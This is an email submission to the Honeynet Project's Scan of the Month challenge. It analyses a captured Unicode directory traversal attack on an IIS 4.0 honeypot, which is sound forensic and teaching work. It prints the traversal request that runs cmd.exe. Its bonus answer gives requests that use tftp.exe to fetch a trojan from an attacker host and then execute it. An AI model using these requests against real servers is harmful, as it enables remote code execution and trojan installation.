From tiger@hideout.art.ro Wed Feb 14 19:13:03 2001 Date: Thu, 1 Feb 2001 18:31:02 +0200 From: Octavian Popescu To: project@honeynet.org Subject: scan of the month (02.01) [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] ### QUESTION 1: What is the operating system of the honeypot, MS Windows NT 4.0 ### how do you know? By the honeypot's initial TTL size - 128,the HTTP response headers (Server: Microsoft-IIS/4.0) and the output of the attacker's request. (found in SESSION:1443-80) ### QUESTION 2: What is the name of this attack? Extended UNICODE directory traversal. (vulnerable servers - IIS 4.0,IIS 5.0) ### QUESTION 3: What is the attack attempting to accomplish? dir c:\ ;) (a listing of the files in the root directory) ### QUESTION 4: How does the attack work? By using extended UNICODE representations for "/" and "\" in a web request, you can access (read,write,execute) any file on the victim's drive,under the priviledges of the IUSR_machinename account. (sort of anonymous account for IIS) Our case: 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E GET /msadc/..... 2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F ./....../....../ 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A md.exe?/c+dir+c: 5C \ We see that "/" was represented using "%c0%af". In other words, the attacker typed: GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ### Bonus Question: Is it possible to gain remote control of the system using this technqiue? If so, how? Yes. By downloading via TFTP (tftp.exe -i evil_ip GET trojan.exe c:\winnt\system32\trojan.exe) a trojan and then executing it via the above method. e.g. Downloading the trojan.exe file: $telnet victim 80 GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/tftp.exe+"-i"+your_ip +GET+trojan.exe+c:\winnt\system32\trojan.exe Executing it: GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/trojan.exe